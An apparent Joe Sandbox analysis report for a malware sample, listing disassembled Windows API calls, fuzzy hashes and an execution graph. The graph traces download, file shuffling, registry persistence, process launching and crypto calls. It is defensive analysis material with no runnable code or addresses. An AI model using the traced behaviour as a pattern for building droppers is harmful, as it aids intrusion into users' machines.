                • Part of subcall function 009A2120: CryptAcquireContextA.ADVAPI32(009BA014,00000000,?,0000000D,F0000000), ref: 009A21DE
                • Part of subcall function 009A2120: CryptAcquireContextA.ADVAPI32(009BA11C,00000000,?,00000018,F0000000), ref: 009A21FA
                • Part of subcall function 009A2120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A2223
                • Part of subcall function 009A2120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A223C
              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 009AE80F
                • Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB
                • Part of subcall function 009A8E30: socket.WS2_32(00000002,00000001,00000006), ref: 009A8E40
                • Part of subcall function 009A8E30: setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 009A8E73
                • Part of subcall function 009A8E30: htons.WS2_32(00000000), ref: 009A8E8C
                • Part of subcall function 009A8E30: htonl.WS2_32(7F000001), ref: 009A8EA4
                • Part of subcall function 009A8E30: bind.WS2_32(00000000,?,00000010), ref: 009A8EB9
                • Part of subcall function 009A8E30: listen.WS2_32(00000000,00000064), ref: 009A8ED0
                • Part of subcall function 009A8E30: getsockname.WS2_32(00000000,?,00000010), ref: 009A8EF4
                • Part of subcall function 009A8E30: htons.WS2_32(?), ref: 009A8F2D
                • Part of subcall function 009A8E30: htons.WS2_32(?), ref: 009A8F56
              • CloseHandle.KERNEL32(?,00000000,00000000,00000000), ref: 009AE9CE
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: ContextCrypt$htons$AcquireReleaseTime$CleanupCloseCompletionCreateCriticalEnterFileHandleHeapPortProcessSectionStartupSystembindgetsocknamehtonllistenmemmovesetsockoptsocket
              • String ID:
              • API String ID: 3177777191-0
              • Opcode ID: a13ca9ffd45825b26002d5d5bb8a2d900eee2ed8c9e1631225c65e0f48a0da2c
              • Instruction ID: 86491ac49c767ddacd02970a1481ee19afbcedbda25591061e06ae2ad50e2322
              • Opcode Fuzzy Hash: a13ca9ffd45825b26002d5d5bb8a2d900eee2ed8c9e1631225c65e0f48a0da2c
              • Instruction Fuzzy Hash: 5F518F70B012245FEB659B14CC66BAAB375BF87308F4441D8F68D6A2C2D6359E80CFD2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: ??2@codecvt
              • String ID:
              • API String ID: 664657501-0
              • Opcode ID: daa78c124cd3077f298454ed31f8a66723e2a8a82edd25a7d5b43721621305ac
              • Instruction ID: 4338ddee62760d66968e77654126d3593f24bc333a2f24dba505b25431debe3d
              • Opcode Fuzzy Hash: daa78c124cd3077f298454ed31f8a66723e2a8a82edd25a7d5b43721621305ac
              • Instruction Fuzzy Hash: 4D41AE70D1C209DFDB04CF95D9983AEBBF0BB45324F148529E442272A1D3790A84DFA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: net$net
              • API String ID: 1659193697-813024420
              • Opcode ID: 8c94581275f34775db6a8e55ff9b505af0b70b957029b1361e9ed60ae861bfb5
              • Instruction ID: 8a55d15128d961c5f46f5183453553c7dc938b17da314398e7d67019c3445e65
              • Opcode Fuzzy Hash: 8c94581275f34775db6a8e55ff9b505af0b70b957029b1361e9ed60ae861bfb5
              • Instruction Fuzzy Hash: 85318E74A5420CEBDB18CBA4CD96FEDB7B8BB49314F144198E605E7280D6B09F84DF90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetModuleFileNameW.KERNEL32(00000000,009BA128,00000208), ref: 009B1015
                • Part of subcall function 009B01E0: _wfopen.MSVCRT ref: 009B01F6
                • Part of subcall function 009B01E0: fseek.MSVCRT ref: 009B0209
                • Part of subcall function 009B01E0: ftell.MSVCRT ref: 009B0215
                • Part of subcall function 009B01E0: fclose.MSVCRT ref: 009B0224
              • ExitThread.KERNEL32 ref: 009B1117
                • Part of subcall function 009B0870: GetLogicalDrives.KERNEL32 ref: 009B0876
                • Part of subcall function 009B0870: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 009B08C4
                • Part of subcall function 009B0870: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 009B08F1
                • Part of subcall function 009B0870: RegCloseKey.ADVAPI32(?), ref: 009B090E
              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 009B10AE
              • Sleep.KERNEL32(000007D0), ref: 009B110A
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CloseDrivesExitFileInformationLogicalModuleNameOpenQuerySleepThreadValueVolume_wfopenfclosefseekftell
              • String ID:
              • API String ID: 3729102641-0
              • Opcode ID: 7a126df46a2384ddaedc1e091f3cd9eb66c30c78d9c25cf41acf8b78b2cf01ca
              • Instruction ID: dc58ddf27dd7db0ccfe8754d0e48d2e0b9dd5b801768a5439068d9dfb831e4cf
              • Opcode Fuzzy Hash: 7a126df46a2384ddaedc1e091f3cd9eb66c30c78d9c25cf41acf8b78b2cf01ca
              • Instruction Fuzzy Hash: 3B31F171D18208BBDB14EBE8DE6ABEEB778EF84714F504059E205A6180D674DA84CF62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A7020: getaddrinfo.WS2_32(00000000,?,00000001,00000006), ref: 009A705F
              • socket.WS2_32(?,?,?), ref: 009A4A1E
              • connect.WS2_32(000000FF,?,?), ref: 009A4A48
              • freeaddrinfo.WS2_32(?), ref: 009A4AA5
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: connectfreeaddrinfogetaddrinfosocket
              • String ID:
              • API String ID: 952663764-0
              • Opcode ID: 1ebe3e5b9fc3ed64852e223b6d56740de40862b5444e5f6e1dee9de48ee50f01
              • Instruction ID: 284846ac84a898687229f9fce6bfaa7171c6ea1d73226108709a92504465e4bd
              • Opcode Fuzzy Hash: 1ebe3e5b9fc3ed64852e223b6d56740de40862b5444e5f6e1dee9de48ee50f01
              • Instruction Fuzzy Hash: A5314FB8A04209EFCB04CF94C944AAEB7B9BF89300F14C699E8259B381C771DE41DB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 009B1153
              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 009B116C
              • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 009B1198
              • CloseHandle.KERNEL32(000000FF), ref: 009B11CD
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: c53df0cc27a4454441c12d0a3c783e6b84900a1b2f9ce195f9dd441df25ab328
              • Instruction ID: 9d92dc628b097b911bf06050297430058d935644c891f4326b5e90e31e42eb0f
              • Opcode Fuzzy Hash: c53df0cc27a4454441c12d0a3c783e6b84900a1b2f9ce195f9dd441df25ab328
              • Instruction Fuzzy Hash: BF211F75A14208FFDB14DFA8CE95FDEBB79AF48310F108688E615A7280D774AA40CB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: _wfopenfclosefseekftell
              • String ID:
              • API String ID: 3257356417-0
              • Opcode ID: 3ba77f8a07c285d4d3af5850b82b864ca9e252133149c934813cfcab9d273ab0
              • Instruction ID: 651ba4ad3488059c666783522a76e84dca7166b109683e39c12f4a76226c4354
              • Opcode Fuzzy Hash: 3ba77f8a07c285d4d3af5850b82b864ca9e252133149c934813cfcab9d273ab0
              • Instruction Fuzzy Hash: 76F0ACB5D00208BBDB10EBA49E46B9D7B789B84710F1045A4FA146B242E575AF14AB91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • closesocket.WS2_32(00000000), ref: 009A8FE7
              • WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A8FF9
              • TerminateThread.KERNEL32(00000000,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9008
              • CloseHandle.KERNEL32(00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9014
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CloseHandleObjectSingleTerminateThreadWaitclosesocket
              • String ID:
              • API String ID: 1562794747-0
              • Opcode ID: 20fab0756399d54048fc481a11e52610c281dc7a14da17c1603a4ebddff31717
              • Instruction ID: d7d51eb7b09b8a427766b904a43b7431b98fef7a4d38ec68963d5b84cd18328c
              • Opcode Fuzzy Hash: 20fab0756399d54048fc481a11e52610c281dc7a14da17c1603a4ebddff31717
              • Instruction Fuzzy Hash: FCF0303113D704AFCB00EBA8EE08F193B6CAB09739F004344F715862A0D6B5D805A7A0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetLastError.KERNEL32 ref: 009A4264
              • GlobalFree.KERNEL32(00000000), ref: 009A42FE
              • GlobalFree.KERNEL32(00000000), ref: 009A430E
              • GlobalFree.KERNEL32(00000000), ref: 009A431E
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: FreeGlobal$ErrorLast
              • String ID:
              • API String ID: 1236395209-0
              • Opcode ID: cea82e6fcb4969c632a156e29b6b5367e2e97a00dfda92234c92b68cf212f1d6
              • Instruction ID: 18e8182f7b91a84ebc6e2efee0cecd691df588da8a221801575084c4df293d78
              • Opcode Fuzzy Hash: cea82e6fcb4969c632a156e29b6b5367e2e97a00dfda92234c92b68cf212f1d6
              • Instruction Fuzzy Hash: 1431B275948249EBCF10DBF8DC687FE7B789FA2301F148158F81496181DBB49748CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:1.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:878
              Total number of Limit Nodes:6
              execution_graph 6131 78427a __set_app_type __p__fmode __p__commode 6132 7842e9 6131->6132 6133 7842fd 6132->6133 6134 7842f1 __setusermatherr 6132->6134 6143 7843e4 _controlfp 6133->6143 6134->6133 6136 784302 _initterm __getmainargs _initterm 6137 784356 GetStartupInfoA 6136->6137 6139 78438a GetModuleHandleA 6137->6139 6144 781360 6139->6144 6143->6136 6369 7841c0 6144->6369 6146 78136d Sleep 6147 78138e 6146->6147 6148 781c99 Sleep 6147->6148 6149 7813a0 FindWindowA 6147->6149 6371 780290 memset InternetOpenA 6148->6371 6151 7813c0 Sleep DeleteFileW MoveFileW 6149->6151 6152 781b62 PathFileExistsW 6149->6152 6154 7813f2 6151->6154 6152->6147 6172 781b0e 6152->6172 6156 781458 13 API calls 6154->6156 6157 78140a 6 API calls 6154->6157 6155 781cbe ExitProcess 6159 781619 9 API calls 6156->6159 6160 781511 8 API calls 6156->6160 6157->6154 6166 7816c1 8 API calls 6159->6166 6171 78196e 6159->6171 6164 781601 InternetCloseHandle DeleteFileW 6160->6164 6170 78158c 6160->6170 6161 781b9c MoveFileW 6161->6172 6162 781bae Sleep FindWindowA 6165 781bd5 7 API calls 6162->6165 6162->6172 6164->6159 6165->6172 6167 781819 InternetCloseHandle Sleep 6166->6167 6168 781746 MoveFileW Sleep MoveFileW DeleteFileW InternetOpenUrlA 6166->6168 6167->6171 6176 78183e 6 API calls 6167->6176 6174 781801 InternetCloseHandle Sleep 6168->6174 6175 7817a5 7 API calls 6168->6175 6169 781cc6 CreateMutexA GetLastError 6177 782078 ExitProcess 6169->6177 6228 782080 6169->6228 6170->6164 6180 7815b3 6 API calls 6170->6180 6178 781a1b PathFileExistsA 6171->6178 6179 781994 FindWindowA 6171->6179 6172->6147 6172->6152 6172->6161 6172->6162 6173 781c52 Sleep MoveFileW Sleep DeleteFileW 6172->6173 6194 781b35 MoveFileW Sleep MoveFileW 6172->6194 6173->6172 6174->6167 6175->6174 6181 781961 InternetCloseHandle 6176->6181 6182 7818a6 InternetOpenUrlA 6176->6182 6184 781a2a DeleteFileA Sleep DeleteFileW Sleep MoveFileW 6178->6184 6185 781a66 FindWindowA 6178->6185 6179->6171 6183 7819b0 7 API calls 6179->6183 6180->6170 6181->6171 6187 7818cf DeleteFileW MoveFileW Sleep DeleteFileW 6182->6187 6188 781900 8 API calls 6182->6188 6183->6171 6184->6185 6185->6172 6186 781a86 11 API calls 6185->6186 6186->6172 6187->6188 6188->6181 6189 7820ba PathFileExistsW 6192 782228 FindWindowA 6189->6192 6193 7820cd MoveFileA Sleep CopyFileA MoveFileA 6189->6193 6190 7826d7 Sleep GetModuleFileNameW PathFindFileNameW 6191 782717 6190->6191 6201 782728 8 API calls 6191->6201 6195 782248 9 API calls 6192->6195 6192->6228 6193->6228 6194->6172 6198 7822d8 DeleteFileA InternetOpenUrlA 6195->6198 6199 78233a InternetCloseHandle PathFileExistsA 6195->6199 6196 78214e Sleep FindWindowA 6200 782175 6 API calls 6196->6200 6196->6228 6197 782131 MoveFileA DeleteFileA 6197->6228 6202 78230c DeleteFileW Sleep 6198->6202 6203 782322 InternetCloseHandle Sleep 6198->6203 6204 782386 FindWindowA 6199->6204 6205 782356 MoveFileA MoveFileA MoveFileA 6199->6205 6200->6228 6208 7827aa Sleep 6201->6208 6209 78384d Sleep 6201->6209 6202->6203 6203->6199 6206 7823d1 6 API calls 6204->6206 6207 7823a2 CopyFileA MoveFileA CloseWindow 6204->6207 6205->6204 6210 782457 MoveFileA FindWindowA InternetOpenA 6206->6210 6206->6228 6207->6206 6311 7827c9 6208->6311 6388 780140 6209->6388 6213 78251b InternetCloseHandle Sleep 6210->6213 6214 78249c Sleep InternetOpenUrlA 6210->6214 6211 7821f4 CopyFileA MoveFileW MoveFileW 6211->6228 6222 782540 6 API calls 6213->6222 6213->6228 6220 7824d0 Sleep MoveFileA DeleteFileA MoveFileW 6214->6220 6221 782506 InternetCloseHandle Sleep 6214->6221 6215 782cf8 Sleep 6223 782d1e 6215->6223 6216 7827db FindWindowA 6225 7827fb 9 API calls 6216->6225 6216->6311 6218 7839b8 Sleep 6227 780140 2 API calls 6218->6227 6219 783889 6226 780140 2 API calls 6219->6226 6220->6221 6221->6213 6229 78259f InternetOpenUrlA 6222->6229 6230 782613 InternetCloseHandle 6222->6230 6223->6209 6231 782d2b Sleep 6223->6231 6224 782642 FindWindowA 6224->6228 6232 78265e MoveFileA DeleteFileW 6224->6232 6233 78287f MoveFileW DeleteFileA MoveFileA DeleteFileA 6225->6233 6234 7828b5 FindWindowA 6225->6234 6237 7838a2 RegSetValueExA 6226->6237 6238 7839dd RegOpenKeyExA 6227->6238 6228->6189 6228->6190 6228->6192 6228->6196 6228->6197 6228->6211 6228->6224 6239 7826b1 MoveFileA 6228->6239 6240 7825d8 InternetCloseHandle Sleep MoveFileA DeleteFileW Sleep 6229->6240 6241 7825c8 MoveFileA 6229->6241 6230->6228 6339 782d4a 6231->6339 6232->6228 6233->6234 6235 782949 InternetOpenA 6234->6235 6236 7828d1 8 API calls 6234->6236 6242 78296b InternetOpenUrlA 6235->6242 6243 7829cd 8 API calls 6235->6243 6236->6235 6244 780140 2 API calls 6237->6244 6245 783b51 Sleep 6238->6245 6246 7839f4 6238->6246 6239->6228 6240->6230 6241->6240 6253 782994 DeleteFileA Sleep DeleteFileA 6242->6253 6254 7829b5 InternetCloseHandle Sleep 6242->6254 6258 782a67 DeleteFileA FindWindowA MoveFileA MoveFileW InternetOpenA 6243->6258 6243->6311 6255 7838cd RegOpenKeyExA 6244->6255 6256 780140 2 API calls 6245->6256 6257 780140 2 API calls 6246->6257 6247 7835bb 9 API calls 6249 783848 6247->6249 6250 78368e Sleep CopyFileW 6247->6250 6248 782d5c FindWindowA 6251 782d7c DeleteFileA Sleep DeleteFileA MoveFileW 6248->6251 6252 783477 PathFileExistsW 6248->6252 6249->6209 6250->6249 6259 7836b7 Sleep wsprintfW SetFileAttributesW SetFileAttributesW RegOpenKeyExW 6250->6259 6260 782db9 6251->6260 6261 78348a DeleteFileA 6252->6261 6252->6339 6253->6254 6254->6243 6262 7838e0 6255->6262 6263 783911 6255->6263 6264 783b76 RegOpenKeyExA 6256->6264 6265 783a00 6257->6265 6266 782b26 InternetCloseHandle Sleep 6258->6266 6267 782ac7 InternetOpenUrlA 6258->6267 6268 783765 RegOpenKeyExW 6259->6268 6269 783725 wcslen RegSetValueExW RegCloseKey 6259->6269 6270 782dd4 Sleep MoveFileW MoveFileW Sleep DeleteFileA 6260->6270 6271 782e17 9 API calls 6260->6271 6261->6339 6273 780140 2 API calls 6262->6273 6277 780140 2 API calls 6263->6277 6274 783cea Sleep CreateThread Sleep CreateThread Sleep 6264->6274 6275 783b8d 6264->6275 6276 780140 2 API calls 6265->6276 6280 782b4b 6 API calls 6266->6280 6266->6311 6278 782af0 DeleteFileW Sleep DeleteFileA 6267->6278 6279 782b11 InternetCloseHandle Sleep 6267->6279 6281 7837c7 RegOpenKeyExW 6268->6281 6282 783787 wcslen RegSetValueExW RegCloseKey 6268->6282 6269->6268 6270->6260 6285 782f8e 8 API calls 6271->6285 6286 782ea1 7 API calls 6271->6286 6272 782c56 FindWindowA 6283 782c72 DeleteFileA 6272->6283 6272->6311 6289 783902 RegCreateKeyExA 6273->6289 6355 783d35 6274->6355 7073 77fcd0 6274->7073 7087 781000 GetModuleFileNameW 6274->7087 6290 780140 2 API calls 6275->6290 6284 783a0f 6276->6284 6291 78392b RegOpenKeyExA 6277->6291 6278->6279 6279->6266 6292 782baa InternetOpenUrlA 6280->6292 6293 782c1c InternetCloseHandle DeleteFileA 6280->6293 6294 783829 6281->6294 6295 7837e9 wcslen RegSetValueExW RegCloseKey 6281->6295 6282->6281 6283->6311 6299 780140 2 API calls 6284->6299 6306 783031 MoveFileW Sleep MoveFileW FindWindowA InternetOpenA 6285->6306 6307 783285 6285->6307 6300 782f11 6286->6300 6301 782f76 InternetCloseHandle DeleteFileW 6286->6301 6287 7834d9 Sleep FindWindowA 6303 783500 8 API calls 6287->6303 6287->6339 6288 7834bc MoveFileW DeleteFileA 6288->6339 6289->6263 6302 783b99 6290->6302 6304 7839ab RegCloseKey 6291->6304 6305 78393e 6291->6305 6308 782bd3 Sleep DeleteFileA MoveFileA DeleteFileA 6292->6308 6309 782c04 InternetCloseHandle Sleep 6292->6309 6293->6311 6383 780080 memset memset CreateProcessW 6294->6383 6295->6294 6296 783d42 Sleep 6296->6355 6297 783f03 exit _XcptFilter 6298 782cb5 CopyFileA DeleteFileA MoveFileA 6298->6311 6312 783a1e 6299->6312 6300->6301 6324 782f38 DeleteFileW Sleep MoveFileW Sleep DeleteFileA 6300->6324 6301->6285 6313 780140 2 API calls 6302->6313 6303->6339 6304->6218 6314 780140 2 API calls 6305->6314 6315 78313f InternetCloseHandle CopyFileA Sleep 6306->6315 6316 783095 Sleep MoveFileW InternetOpenUrlA 6306->6316 6318 783317 PathFileExistsA 6307->6318 6319 7832a7 FindWindowA 6307->6319 6308->6309 6309->6293 6311->6215 6311->6216 6311->6272 6311->6298 6323 780140 2 API calls 6312->6323 6325 783ba8 6313->6325 6327 78394a 6314->6327 6315->6307 6317 783176 6 API calls 6315->6317 6328 7830d9 6 API calls 6316->6328 6329 783127 InternetCloseHandle Sleep 6316->6329 6330 783278 InternetCloseHandle 6317->6330 6331 7831de InternetOpenUrlA 6317->6331 6334 783362 FindWindowA 6318->6334 6335 783326 DeleteFileA Sleep DeleteFileW Sleep MoveFileW 6318->6335 6319->6307 6332 7832c3 DeleteFileA MoveFileW Sleep CopyFileA Sleep 6319->6332 6321 783e1e Sleep ??2@YAPAXI 6425 77eb80 6321->6425 6322 783d75 Sleep 6322->6355 6336 783a2d 6323->6336 6324->6300 6338 780140 2 API calls 6325->6338 6326 78358a DeleteFileW MoveFileW 6326->6339 6340 780140 2 API calls 6327->6340 6328->6329 6329->6315 6330->6307 6341 78324a InternetCloseHandle Sleep DeleteFileA Sleep 6331->6341 6342 783207 CopyFileA Sleep MoveFileW Sleep DeleteFileW 6331->6342 6332->6307 6333 783840 ExitProcess 6334->6339 6345 783382 11 API calls 6334->6345 6335->6334 6344 780140 2 API calls 6336->6344 6346 783bb7 6338->6346 6339->6247 6339->6248 6339->6252 6339->6287 6339->6288 6339->6326 6353 783439 Sleep DeleteFileW DeleteFileA MoveFileW DeleteFileW 6339->6353 6347 783959 RegSetValueExA RegSetValueExA RegCloseKey 6340->6347 6341->6330 6342->6341 6343 783da4 Sleep wsprintfA 6393 780370 InternetOpenA 6343->6393 6349 783a3c 6344->6349 6345->6339 6351 780140 2 API calls 6346->6351 6347->6304 6352 780140 2 API calls 6349->6352 6350 783ef3 Sleep 6350->6355 6354 783bc6 6351->6354 6356 783a4b 6352->6356 6353->6339 6358 780140 2 API calls 6354->6358 6355->6296 6355->6297 6355->6321 6355->6322 6355->6343 6355->6350 6357 783e88 Sleep wsprintfA 6355->6357 6400 780410 11 API calls 6355->6400 6462 77eec0 6355->6462 6361 780140 2 API calls 6356->6361 6445 7811e0 6357->6445 6359 783bd5 6358->6359 6364 780140 2 API calls 6359->6364 6365 783a5a 8 API calls 6361->6365 6366 783be4 6364->6366 6365->6245 6367 780140 2 API calls 6366->6367 6368 783bf3 8 API calls 6367->6368 6368->6274 6370 7841cc 6369->6370 6370->6146 6370->6370 6372 780339 InternetCloseHandle 6371->6372 6373 7802c2 InternetOpenUrlA 6371->6373 6376 780345 6372->6376 6374 78032f InternetCloseHandle 6373->6374 6375 7802e2 InternetReadFile 6373->6375 6374->6372 6474 780350 strchr 6375->6474 6376->6155 6381 780240 memset GetLocaleInfoA strcmp 6376->6381 6378 780301 6378->6374 6379 78030d strcmp 6378->6379 6379->6374 6380 78032b 6379->6380 6380->6376 6382 78027e 6381->6382 6382->6155 6382->6169 6384 7800f1 Sleep ShellExecuteW 6383->6384 6385 7800e2 Sleep 6383->6385 6386 780131 6384->6386 6387 780122 Sleep 6384->6387 6385->6386 6386->6249 6386->6333 6387->6386 6389 780169 strlen 6388->6389 6390 780160 6389->6390 6391 7801cf RegOpenKeyExA 6389->6391 6390->6389 6392 78018c strlen 6390->6392 6391->6218 6391->6219 6392->6390 6394 780408 6393->6394 6395 780396 InternetOpenUrlA 6393->6395 6394->6355 6396 7803fe InternetCloseHandle 6395->6396 6397 7803b5 HttpQueryInfoA 6395->6397 6396->6394 6398 7803de 6397->6398 6399 7803f4 InternetCloseHandle 6397->6399 6398->6399 6399->6396 6401 78066b InternetCloseHandle Sleep 6400->6401 6402 7804f0 InternetOpenUrlW 6400->6402 6405 780692 6 API calls 6401->6405 6420 780771 6401->6420 6403 78065e InternetCloseHandle 6402->6403 6404 78051f CreateFileW 6402->6404 6403->6401 6406 78054e memset 6404->6406 6407 780651 CloseHandle 6404->6407 6408 780710 wsprintfW DeleteFileW Sleep 6405->6408 6405->6420 6409 780564 InternetReadFile 6406->6409 6407->6403 6410 77fe60 24 API calls 6408->6410 6411 780588 6409->6411 6412 7805b7 CloseHandle Sleep wsprintfW DeleteFileW Sleep 6409->6412 6413 780750 6410->6413 6411->6412 6414 780591 WriteFile 6411->6414 6475 77fe60 CryptImportKey 6412->6475 6415 78075a Sleep 6413->6415 6416 780776 DeleteFileW 6413->6416 6414->6409 6418 780080 7 API calls 6415->6418 6416->6420 6418->6420 6420->6355 6421 780619 Sleep 6423 780080 7 API calls 6421->6423 6422 780644 DeleteFileW 6422->6407 6424 780630 6423->6424 6424->6407 6426 77eb96 6425->6426 6427 77eb9f ??2@YAPAXI 6425->6427 6426->6427 6428 77ebec 6426->6428 6429 77ebb5 6427->6429 6430 77ebbd ??2@YAPAXI 6427->6430 6438 77ec66 6428->6438 6510 7735d0 EnterCriticalSection 6428->6510 6501 77da30 6429->6501 6430->6428 6434 77ebe4 